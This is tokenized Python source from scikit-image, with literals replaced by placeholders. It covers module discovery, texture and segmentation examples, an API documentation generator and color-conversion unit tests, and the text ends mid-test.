'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> def get_modules_in_library ( library , ignorefileext = None , ignoredirs = None ) : <EOL> """<STR_LIT>""" <EOL> if ignoredirs is None : <EOL> ignoredirs = _IGNORE_DIRS <EOL> if ignorefileext is None : <EOL> ignorefileext = _IGNORE_FILE_EXT <EOL> module = importlib . import_module ( library ) <EOL> mods = [ ] <EOL> other_files = [ ] <EOL> top_level = os . sep . join ( module . __file__ . split ( os . sep ) [ : - <NUM_LIT:1> ] ) <EOL> for path , dirs , files in os . walk ( top_level ) : <EOL> skip = False <EOL> for ignore in ignoredirs : <EOL> if ignore in path : <EOL> skip = True <EOL> break <EOL> if skip : <EOL> continue <EOL> if path . split ( os . sep ) [ - <NUM_LIT:1> ] in ignoredirs : <EOL> continue <EOL> for f in files : <EOL> file_base , file_ext = os . path . splitext ( f ) <EOL> if file_ext not in ignorefileext : <EOL> if file_ext == '<STR_LIT>' : <EOL> mod_path = path [ len ( top_level ) - len ( library ) : ] . split ( os . sep ) <EOL> if not file_base == '<STR_LIT>' : <EOL> mod_path . append ( file_base ) <EOL> mod_path = '<STR_LIT:.>' . join ( mod_path ) <EOL> mods . append ( mod_path ) <EOL> else : <EOL> other_files . append ( os . path . join ( path , f ) ) <EOL> return mods , other_files <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import nose <EOL> import sys <EOL> nose_args = [ '<STR_LIT>' ] + sys . argv [ <NUM_LIT:1> : ] <EOL> nose . runmodule ( argv = nose_args , exit = False ) </s>
<s> """<STR_LIT>""" <EOL> import matplotlib . pyplot as plt <EOL> from skimage . feature import greycomatrix , greycoprops <EOL> from skimage import data <EOL> PATCH_SIZE = <NUM_LIT> <EOL> image = data . camera ( ) <EOL> grass_locations = [ ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> grass_patches = [ ] <EOL> for loc in grass_locations : <EOL> grass_patches . append ( image [ loc [ <NUM_LIT:0> ] : loc [ <NUM_LIT:0> ] + PATCH_SIZE , <EOL> loc [ <NUM_LIT:1> ] : loc [ <NUM_LIT:1> ] + PATCH_SIZE ] ) <EOL> sky_locations = [ ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> sky_patches = [ ] <EOL> for loc in sky_locations : <EOL> sky_patches . append ( image [ loc [ <NUM_LIT:0> ] : loc [ <NUM_LIT:0> ] + PATCH_SIZE , <EOL> loc [ <NUM_LIT:1> ] : loc [ <NUM_LIT:1> ] + PATCH_SIZE ] ) <EOL> xs = [ ] <EOL> ys = [ ] <EOL> for patch in ( grass_patches + sky_patches ) : <EOL> glcm = greycomatrix ( patch , [ <NUM_LIT:5> ] , [ <NUM_LIT:0> ] , <NUM_LIT> , symmetric = True , normed = True ) <EOL> xs . append ( greycoprops ( glcm , '<STR_LIT>' ) [ <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> ys . append ( greycoprops ( glcm , '<STR_LIT>' ) [ <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> fig = plt . figure ( figsize = ( <NUM_LIT:8> , <NUM_LIT:8> ) ) <EOL> ax = fig . add_subplot ( <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> ) <EOL> ax . imshow ( image , cmap = plt . cm . gray , interpolation = '<STR_LIT>' , <EOL> vmin = <NUM_LIT:0> , vmax = <NUM_LIT:255> ) <EOL> for ( y , x ) in grass_locations : <EOL> ax . plot ( x + PATCH_SIZE / <NUM_LIT:2> , y + PATCH_SIZE / <NUM_LIT:2> , '<STR_LIT>' ) <EOL> for ( y , x ) in sky_locations : <EOL> ax . plot ( x + PATCH_SIZE / <NUM_LIT:2> , y + PATCH_SIZE / <NUM_LIT:2> , '<STR_LIT>' ) <EOL> ax . set_xlabel ( '<STR_LIT>' ) <EOL> ax . set_xticks ( [ ] ) <EOL> ax . set_yticks ( [ ] ) <EOL> ax . axis ( '<STR_LIT:image>' ) <EOL> ax = fig . add_subplot ( <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> ax . plot ( xs [ : len ( grass_patches ) ] , ys [ : len ( grass_patches ) ] , '<STR_LIT>' , <EOL> label = '<STR_LIT>' ) <EOL> ax . plot ( xs [ len ( grass_patches ) : ] , ys [ len ( grass_patches ) : ] , '<STR_LIT>' , <EOL> label = '<STR_LIT>' ) <EOL> ax . set_xlabel ( '<STR_LIT>' ) <EOL> ax . set_ylabel ( '<STR_LIT>' ) <EOL> ax . legend ( ) <EOL> for i , patch in enumerate ( grass_patches ) : <EOL> ax = fig . add_subplot ( <NUM_LIT:3> , len ( grass_patches ) , len ( grass_patches ) * <NUM_LIT:1> + i + <NUM_LIT:1> ) <EOL> ax . imshow ( patch , cmap = plt . cm . gray , interpolation = '<STR_LIT>' , <EOL> vmin = <NUM_LIT:0> , vmax = <NUM_LIT:255> ) <EOL> ax . set_xlabel ( '<STR_LIT>' % ( i + <NUM_LIT:1> ) ) <EOL> for i , patch in enumerate ( sky_patches ) : <EOL> ax = fig . add_subplot ( <NUM_LIT:3> , len ( sky_patches ) , len ( sky_patches ) * <NUM_LIT:2> + i + <NUM_LIT:1> ) <EOL> ax . imshow ( patch , cmap = plt . cm . gray , interpolation = '<STR_LIT>' , <EOL> vmin = <NUM_LIT:0> , vmax = <NUM_LIT:255> ) <EOL> ax . set_xlabel ( '<STR_LIT>' % ( i + <NUM_LIT:1> ) ) <EOL> fig . suptitle ( '<STR_LIT>' , fontsize = <NUM_LIT> ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import matplotlib . pyplot as plt <EOL> import numpy as np <EOL> from skimage . data import astronaut <EOL> from skimage . segmentation import felzenszwalb , slic , quickshift <EOL> from skimage . segmentation import mark_boundaries <EOL> from skimage . util import img_as_float <EOL> img = img_as_float ( astronaut ( ) [ : : <NUM_LIT:2> , : : <NUM_LIT:2> ] ) <EOL> segments_fz = felzenszwalb ( img , scale = <NUM_LIT:100> , sigma = <NUM_LIT:0.5> , min_size = <NUM_LIT:50> ) <EOL> segments_slic = slic ( img , n_segments = <NUM_LIT> , compactness = <NUM_LIT:10> , sigma = <NUM_LIT:1> ) <EOL> segments_quick = quickshift ( img , kernel_size = <NUM_LIT:3> , max_dist = <NUM_LIT:6> , ratio = <NUM_LIT:0.5> ) <EOL> print ( "<STR_LIT>" % len ( np . unique ( segments_fz ) ) ) <EOL> print ( "<STR_LIT>" % len ( np . unique ( segments_slic ) ) ) <EOL> print ( "<STR_LIT>" % len ( np . unique ( segments_quick ) ) ) <EOL> fig , ax = plt . subplots ( <NUM_LIT:1> , <NUM_LIT:3> , sharex = True , sharey = True , <EOL> subplot_kw = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> fig . set_size_inches ( <NUM_LIT:8> , <NUM_LIT:3> , forward = True ) <EOL> fig . tight_layout ( ) <EOL> ax [ <NUM_LIT:0> ] . imshow ( mark_boundaries ( img , segments_fz ) ) <EOL> ax [ <NUM_LIT:0> ] . set_title ( "<STR_LIT>" ) <EOL> ax [ <NUM_LIT:1> ] . imshow ( mark_boundaries ( img , segments_slic ) ) <EOL> ax [ <NUM_LIT:1> ] . set_title ( "<STR_LIT>" ) <EOL> ax [ <NUM_LIT:2> ] . imshow ( mark_boundaries ( img , segments_quick ) ) <EOL> ax [ <NUM_LIT:2> ] . set_title ( "<STR_LIT>" ) <EOL> for a in ax : <EOL> a . set_xticks ( ( ) ) <EOL> a . set_yticks ( ( ) ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import re <EOL> from types import BuiltinFunctionType , FunctionType <EOL> DEBUG = True <EOL> class ApiDocWriter ( object ) : <EOL> '''<STR_LIT>''' <EOL> rst_section_levels = [ '<STR_LIT:*>' , '<STR_LIT:=>' , '<STR_LIT:->' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , <EOL> package_name , <EOL> rst_extension = '<STR_LIT>' , <EOL> package_skip_patterns = None , <EOL> module_skip_patterns = None , <EOL> ) : <EOL> '''<STR_LIT>''' <EOL> if package_skip_patterns is None : <EOL> package_skip_patterns = [ '<STR_LIT>' ] <EOL> if module_skip_patterns is None : <EOL> module_skip_patterns = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . package_name = package_name <EOL> self . rst_extension = rst_extension <EOL> self . package_skip_patterns = package_skip_patterns <EOL> self . module_skip_patterns = module_skip_patterns <EOL> def get_package_name ( self ) : <EOL> return self . _package_name <EOL> def set_package_name ( self , package_name ) : <EOL> '''<STR_LIT>''' <EOL> self . _package_name = package_name <EOL> root_module = self . _import ( package_name ) <EOL> self . root_path = root_module . __path__ [ - <NUM_LIT:1> ] <EOL> self . written_modules = None <EOL> package_name = property ( get_package_name , set_package_name , None , <EOL> '<STR_LIT>' ) <EOL> def _import ( self , name ) : <EOL> '''<STR_LIT>''' <EOL> mod = __import__ ( name ) <EOL> components = name . split ( '<STR_LIT:.>' ) <EOL> for comp in components [ <NUM_LIT:1> : ] : <EOL> mod = getattr ( mod , comp ) <EOL> return mod <EOL> def _get_object_name ( self , line ) : <EOL> '''<STR_LIT>''' <EOL> name = line . split ( ) [ <NUM_LIT:1> ] . split ( '<STR_LIT:(>' ) [ <NUM_LIT:0> ] . strip ( ) <EOL> return name . rstrip ( '<STR_LIT::>' ) <EOL> def _uri2path ( self , uri ) : <EOL> '''<STR_LIT>''' <EOL> if uri == self . package_name : <EOL> return os . path . join ( self . root_path , '<STR_LIT>' ) <EOL> path = uri . replace ( self . package_name + '<STR_LIT:.>' , '<STR_LIT>' ) <EOL> path = path . replace ( '<STR_LIT:.>' , os . path . sep ) <EOL> path = os . path . join ( self . root_path , path ) <EOL> if os . path . exists ( path + '<STR_LIT>' ) : <EOL> path += '<STR_LIT>' <EOL> elif os . path . exists ( os . path . join ( path , '<STR_LIT>' ) ) : <EOL> path = os . path . join ( path , '<STR_LIT>' ) <EOL> else : <EOL> return None <EOL> return path <EOL> def _path2uri ( self , dirpath ) : <EOL> '''<STR_LIT>''' <EOL> package_dir = self . package_name . replace ( '<STR_LIT:.>' , os . path . sep ) <EOL> relpath = dirpath . replace ( self . root_path , package_dir ) <EOL> if relpath . startswith ( os . path . sep ) : <EOL> relpath = relpath [ <NUM_LIT:1> : ] <EOL> return relpath . replace ( os . path . sep , '<STR_LIT:.>' ) <EOL> def _parse_module ( self , uri ) : <EOL> '''<STR_LIT>''' <EOL> filename = self . _uri2path ( uri ) <EOL> if filename is None : <EOL> print ( filename , '<STR_LIT>' ) <EOL> return ( [ ] , [ ] ) <EOL> f = open ( filename , '<STR_LIT>' ) <EOL> functions , classes = self . _parse_lines ( f ) <EOL> f . close ( ) <EOL> return functions , classes <EOL> def _parse_module_with_import ( self , uri ) : <EOL> """<STR_LIT>""" <EOL> mod = __import__ ( uri , fromlist = [ uri . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] ] ) <EOL> obj_strs = [ obj for obj in dir ( mod ) if not obj . startswith ( '<STR_LIT:_>' ) ] <EOL> functions = [ ] <EOL> classes = [ ] <EOL> for obj_str in obj_strs : <EOL> if obj_str not in mod . __dict__ : <EOL> continue <EOL> obj = mod . __dict__ [ obj_str ] <EOL> if isinstance ( obj , ( FunctionType , BuiltinFunctionType ) ) : <EOL> functions . append ( obj_str ) <EOL> else : <EOL> try : <EOL> issubclass ( obj , object ) <EOL> classes . append ( obj_str ) <EOL> except TypeError : <EOL> pass <EOL> return functions , classes <EOL> def _parse_lines ( self , linesource ) : <EOL> '''<STR_LIT>''' <EOL> functions = [ ] <EOL> classes = [ ] <EOL> for line in linesource : <EOL> if line . startswith ( '<STR_LIT>' ) and line . count ( '<STR_LIT:(>' ) : <EOL> name = self . _get_object_name ( line ) <EOL> if not name . startswith ( '<STR_LIT:_>' ) : <EOL> functions . append ( name ) <EOL> elif line . startswith ( '<STR_LIT>' ) : <EOL> name = self . _get_object_name ( line ) <EOL> if not name . startswith ( '<STR_LIT:_>' ) : <EOL> classes . append ( name ) <EOL> else : <EOL> pass <EOL> functions . sort ( ) <EOL> classes . sort ( ) <EOL> return functions , classes <EOL> def generate_api_doc ( self , uri ) : <EOL> '''<STR_LIT>''' <EOL> functions , classes = self . _parse_module_with_import ( uri ) <EOL> if not len ( functions ) and not len ( classes ) and DEBUG : <EOL> print ( '<STR_LIT>' , uri ) <EOL> return '<STR_LIT>' <EOL> uri_short = re . sub ( r'<STR_LIT>' % self . package_name , '<STR_LIT>' , uri ) <EOL> ad = '<STR_LIT>' <EOL> if '<STR_LIT:.>' in uri : <EOL> title = '<STR_LIT>' + uri_short + '<STR_LIT>' <EOL> else : <EOL> title = '<STR_LIT>' + uri_short + '<STR_LIT>' <EOL> ad += title + '<STR_LIT:\n>' + self . rst_section_levels [ <NUM_LIT:1> ] * len ( title ) <EOL> ad += '<STR_LIT>' + uri + '<STR_LIT:\n>' <EOL> ad += '<STR_LIT>' + uri + '<STR_LIT:\n>' <EOL> ad += '<STR_LIT>' <EOL> for f in functions : <EOL> ad += '<STR_LIT:U+0020>' + uri + '<STR_LIT:.>' + f + '<STR_LIT:\n>' <EOL> ad += '<STR_LIT:\n>' <EOL> for c in classes : <EOL> ad += '<STR_LIT:U+0020>' + uri + '<STR_LIT:.>' + c + '<STR_LIT:\n>' <EOL> ad += '<STR_LIT:\n>' <EOL> for f in functions : <EOL> full_f = uri + '<STR_LIT:.>' + f <EOL> ad += f + '<STR_LIT:\n>' <EOL> ad += self . rst_section_levels [ <NUM_LIT:2> ] * len ( f ) + '<STR_LIT:\n>' <EOL> ad += '<STR_LIT>' + full_f + '<STR_LIT>' <EOL> for c in classes : <EOL> ad += '<STR_LIT>' + c + '<STR_LIT>' + self . rst_section_levels [ <NUM_LIT:2> ] * ( len ( c ) + <NUM_LIT:9> ) + '<STR_LIT>' <EOL> ad += '<STR_LIT>' + c + '<STR_LIT:\n>' <EOL> ad += '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT:\n>' '<STR_LIT>' <EOL> return ad <EOL> def _survives_exclude ( self , matchstr , match_type ) : <EOL> '''<STR_LIT>''' <EOL> if match_type == '<STR_LIT>' : <EOL> patterns = self . module_skip_patterns <EOL> elif match_type == '<STR_LIT>' : <EOL> patterns = self . package_skip_patterns <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' <EOL> % match_type ) <EOL> L = len ( self . package_name ) <EOL> if matchstr [ : L ] == self . package_name : <EOL> matchstr = matchstr [ L : ] <EOL> for pat in patterns : <EOL> try : <EOL> pat . search <EOL> except AttributeError : <EOL> pat = re . compile ( pat ) <EOL> if pat . search ( matchstr ) : <EOL> return False <EOL> return True <EOL> def discover_modules ( self ) : <EOL> '''<STR_LIT>''' <EOL> modules = [ self . package_name ] <EOL> for dirpath , dirnames , filenames in os . walk ( self . root_path ) : <EOL> root_uri = self . _path2uri ( os . path . join ( self . root_path , <EOL> dirpath ) ) <EOL> for dirname in dirnames [ : ] : <EOL> package_uri = '<STR_LIT:.>' . join ( ( root_uri , dirname ) ) <EOL> if ( self . _uri2path ( package_uri ) and <EOL> self . _survives_exclude ( package_uri , '<STR_LIT>' ) ) : <EOL> modules . append ( package_uri ) <EOL> else : <EOL> dirnames . remove ( dirname ) <EOL> return sorted ( modules ) <EOL> def write_modules_api ( self , modules , outdir ) : <EOL> written_modules = [ ] <EOL> for m in modules : <EOL> api_str = self . generate_api_doc ( m ) <EOL> if not api_str : <EOL> continue <EOL> outfile = os . path . join ( outdir , <EOL> m + self . rst_extension ) <EOL> fileobj = open ( outfile , '<STR_LIT>' ) <EOL> fileobj . write ( api_str ) <EOL> fileobj . close ( ) <EOL> written_modules . append ( m ) <EOL> self . written_modules = written_modules <EOL> def write_api_docs ( self , outdir ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . exists ( outdir ) : <EOL> os . mkdir ( outdir ) <EOL> modules = self . discover_modules ( ) <EOL> self . write_modules_api ( modules , outdir ) <EOL> def write_index ( self , outdir , froot = '<STR_LIT>' , relative_to = None ) : <EOL> """<STR_LIT>""" <EOL> if self . written_modules is None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> path = os . path . join ( outdir , froot + self . rst_extension ) <EOL> if relative_to is not None : <EOL> relpath = ( outdir + os . path . sep ) . replace ( relative_to + os . path . sep , '<STR_LIT>' ) <EOL> else : <EOL> relpath = outdir <EOL> print ( "<STR_LIT>" , relpath ) <EOL> idx = open ( path , '<STR_LIT>' ) <EOL> w = idx . write <EOL> w ( '<STR_LIT>' ) <EOL> title = "<STR_LIT>" <EOL> w ( title + "<STR_LIT:\n>" ) <EOL> w ( "<STR_LIT:=>" * len ( title ) + "<STR_LIT>" ) <EOL> w ( '<STR_LIT>' ) <EOL> for f in self . written_modules : <EOL> w ( '<STR_LIT>' % os . path . join ( relpath , f ) ) <EOL> idx . close ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import os . path <EOL> import numpy as np <EOL> from numpy . testing import ( assert_equal , <EOL> assert_almost_equal , <EOL> assert_array_almost_equal , <EOL> assert_raises , <EOL> TestCase , <EOL> ) <EOL> from skimage import img_as_float , img_as_ubyte <EOL> from skimage . io import imread <EOL> from skimage . color import ( rgb2hsv , hsv2rgb , <EOL> rgb2xyz , xyz2rgb , <EOL> rgb2hed , hed2rgb , <EOL> separate_stains , <EOL> combine_stains , <EOL> rgb2rgbcie , rgbcie2rgb , <EOL> convert_colorspace , <EOL> rgb2grey , gray2rgb , <EOL> xyz2lab , lab2xyz , <EOL> lab2rgb , rgb2lab , <EOL> xyz2luv , luv2xyz , <EOL> luv2rgb , rgb2luv , <EOL> lab2lch , lch2lab , <EOL> guess_spatial_dimensions <EOL> ) <EOL> from skimage import data_dir <EOL> from skimage . _shared . _warnings import expected_warnings <EOL> import colorsys <EOL> def test_guess_spatial_dimensions ( ) : <EOL> im1 = np . zeros ( ( <NUM_LIT:5> , <NUM_LIT:5> ) ) <EOL> im2 = np . zeros ( ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> ) ) <EOL> im3 = np . zeros ( ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:3> ) ) <EOL> im4 = np . zeros ( ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:3> ) ) <EOL> im5 = np . zeros ( ( <NUM_LIT:5> , ) ) <EOL> assert_equal ( guess_spatial_dimensions ( im1 ) , <NUM_LIT:2> ) <EOL> assert_equal ( guess_spatial_dimensions ( im2 ) , <NUM_LIT:3> ) <EOL> assert_equal ( guess_spatial_dimensions ( im3 ) , None ) <EOL> assert_equal ( guess_spatial_dimensions ( im4 ) , <NUM_LIT:3> ) <EOL> assert_raises ( ValueError , guess_spatial_dimensions , im5 ) <EOL> class TestColorconv ( TestCase ) : <EOL> img_rgb = imread ( os . path . join ( data_dir , '<STR_LIT>' ) ) <EOL> img_grayscale = imread ( os . path . join ( data_dir , '<STR_LIT>' ) ) <EOL> colbars = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] ] ) . astype ( np . float ) <EOL> colbars_array = np . swapaxes ( colbars . reshape ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:2> ) , <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> colbars_point75 = colbars * <NUM_LIT> <EOL> colbars_point75_array = np . swapaxes ( colbars_point75 . reshape ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:2> ) , <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> xyz_array = np . array ( [ [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] , <EOL> [ [ <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> ] ) <EOL> lab_array = np . array ( [ [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] ] , <EOL> [ [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] ] , <EOL> ] ) <EOL> luv_array = np . array ( [ [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] ] , <EOL> [ [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] ] , <EOL> ] ) <EOL> def test_rgb2hsv_conversion ( self ) : <EOL> rgb = img_as_float ( self . img_rgb ) [ : : <NUM_LIT:16> , : : <NUM_LIT:16> ] <EOL> hsv = rgb2hsv ( rgb ) . reshape ( - <NUM_LIT:1> , <NUM_LIT:3> ) <EOL> gt = np . array ( [ colorsys . rgb_to_hsv ( pt [ <NUM_LIT:0> ] , pt [ <NUM_LIT:1> ] , pt [ <NUM_LIT:2> ] ) <EOL> for pt in rgb . reshape ( - <NUM_LIT:1> , <NUM_LIT:3> ) ] <EOL> ) <EOL> assert_almost_equal ( hsv , gt ) <EOL> def test_rgb2hsv_error_grayscale ( self ) : <EOL> self . assertRaises ( ValueError , rgb2hsv , self . img_grayscale ) <EOL> def test_rgb2hsv_error_one_element ( self ) : <EOL> self . assertRaises ( ValueError , rgb2hsv , self . img_rgb [ <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> def test_hsv2rgb_conversion ( self ) : <EOL> rgb = self . img_rgb . astype ( "<STR_LIT>" ) [ : : <NUM_LIT:16> , : : <NUM_LIT:16> ] <EOL> hsv = np . array ( [ colorsys . rgb_to_hsv ( pt [ <NUM_LIT:0> ] , pt [ <NUM_LIT:1> ] , pt [ <NUM_LIT:2> ] ) <EOL> for pt in rgb . reshape ( - <NUM_LIT:1> , <NUM_LIT:3> ) ] ) . reshape ( rgb . shape ) <EOL> assert_almost_equal ( rgb , hsv2rgb ( hsv ) , decimal = <NUM_LIT:4> ) <EOL> def test_hsv2rgb_error_grayscale ( self ) : <EOL> self . assertRaises ( ValueError , hsv2rgb , self . img_grayscale ) <EOL> def test_hsv2rgb_error_one_element ( self ) : <EOL> self . assertRaises ( ValueError , hsv2rgb , self . img_rgb [ <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> def test_rgb2xyz_conversion ( self ) : <EOL> gt = np . array ( [ [ [ <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] ] ] ) <EOL> assert_almost_equal ( rgb2xyz ( self . colbars_array ) , gt ) <EOL> def test_rgb2xyz_error_grayscale ( self ) : <EOL> self . assertRaises ( ValueError , rgb2xyz , self . img_grayscale ) <EOL> def test_rgb2xyz_error_one_element ( self ) : <EOL> self . assertRaises ( ValueError , rgb2xyz , self . img_rgb [ <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> def test_xyz2rgb_conversion ( self ) : <EOL> assert_almost_equal ( xyz2rgb ( rgb2xyz ( self . colbars_array ) ) , <EOL> self . colbars_array ) <EOL> def test_xyz_rgb_roundtrip ( self ) : <EOL> img_rgb = img_as_float ( self . img_rgb ) <EOL> assert_array_almost_equal ( xyz2rgb ( rgb2xyz ( img_rgb ) ) , img_rgb ) <EOL> def test_hed_rgb_roundtrip ( self ) : <EOL> img_rgb = img_as_ubyte ( self . img_rgb ) <EOL> with expected_warnings ( [ '<STR_LIT>' ] ) : <EOL> new = img_as_ubyte ( hed2rgb ( rgb2hed ( img_rgb ) ) ) <EOL> assert_equal ( new , img_rgb ) <EOL> def test_hed_rgb_float_roundtrip ( self ) : <EOL> img_rgb = img_as_float ( self . img_rgb ) <EOL> assert_array_almost_equal ( hed2rgb ( rgb2hed ( img_rgb ) ) , img_rgb ) <EOL> def test_hdx_rgb_roundtrip ( self ) : <EOL> from skimage . color . colorconv import hdx_from_rgb , rgb_from_hdx <EOL> img_rgb = self . img_rgb <EOL> conv = combine_stains ( separate_stains ( img_rgb , hdx_from_rgb ) , <EOL> rgb_from_hdx ) <EOL> assert_equal ( img_as_ubyte ( conv ) , img_rgb ) <EOL> def test_hdx_rgb_roundtrip ( self ) : <EOL> from skimage . color . colorconv import hdx_from_rgb , rgb_from_hdx <EOL> img_rgb = img_as_float ( self . img_rgb ) <EOL> conv = combine_stains ( separate_stains ( img_rgb , hdx_from_rgb ) , <EOL> rgb_from_hdx ) <EOL> assert_array_almost_equal ( conv , img_rgb ) <EOL> def test_rgb2rgbcie_conversion ( self ) : <EOL> gt = np . array ( [ [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] ] ] ) <EOL> assert_almost_equal ( rgb2rgbcie ( self . colbars_array ) , gt ) <EOL> def test_rgbcie2rgb_conversion ( self ) : <EOL> assert_almost_equal ( rgbcie2rgb ( rgb2rgbcie ( self . colbars_array ) ) , <EOL> self . colbars_array ) <EOL> def test_convert_colorspace ( self ) : <EOL> colspaces = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> colfuncs_from = [ hsv2rgb , rgbcie2rgb , xyz2rgb ] <EOL> colfuncs_to = [ rgb2hsv , rgb2rgbcie , rgb2xyz ] <EOL> assert_almost_equal ( convert_colorspace ( self . colbars_array , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , self . colbars_array ) <EOL> for i , space in enumerate ( colspaces ) : <EOL> gt = colfuncs_from [ i ] ( self . colbars_array ) <EOL> assert_almost_equal ( convert_colorspace ( self . colbars_array , space , <EOL> '<STR_LIT>' ) , gt ) <EOL> gt = colfuncs_to [ i ] ( self . colbars_array ) <EOL> assert_almost_equal ( convert_colorspace ( self . colbars_array , '<STR_LIT>' , <EOL> space ) , gt ) <EOL> self . assertRaises ( ValueError , convert_colorspace , self . colbars_array , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertRaises ( ValueError , convert_colorspace , self . colbars_array , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_rgb2grey ( self ) : <EOL> x = np . array ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ) . reshape ( ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> ) ) . astype ( np . float ) <EOL> g = rgb2grey ( x ) <EOL> assert_array_almost_equal ( g , <NUM_LIT:1> ) <EOL> assert_equal ( g . shape , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> def test_rgb2grey_contiguous ( self ) : <EOL> x = np . random . rand ( <NUM_LIT:10> , <NUM_LIT:10> , <NUM_LIT:3> ) <EOL> assert rgb2grey ( x ) . flags [ "<STR_LIT>" ] <EOL> assert rgb2grey ( x [ : <NUM_LIT:5> , : <NUM_LIT:5> ] ) . flags [ "<STR_LIT>" ] <EOL> def test_rgb2grey_alpha ( self ) : <EOL> x = np . random . rand ( <NUM_LIT:10> , <NUM_LIT:10> , <NUM_LIT:4> ) <EOL> assert rgb2grey ( x ) . ndim == <NUM_LIT:2> <EOL> def test_rgb2grey_on_grey ( self ) : <EOL> rgb2grey ( np . random . rand ( <NUM_LIT:5> , <NUM_LIT:5> ) ) <EOL> def test_xyz2lab ( self ) : <EOL> assert_array_almost_equal ( xyz2lab ( self . xyz_array ) , <EOL> self . 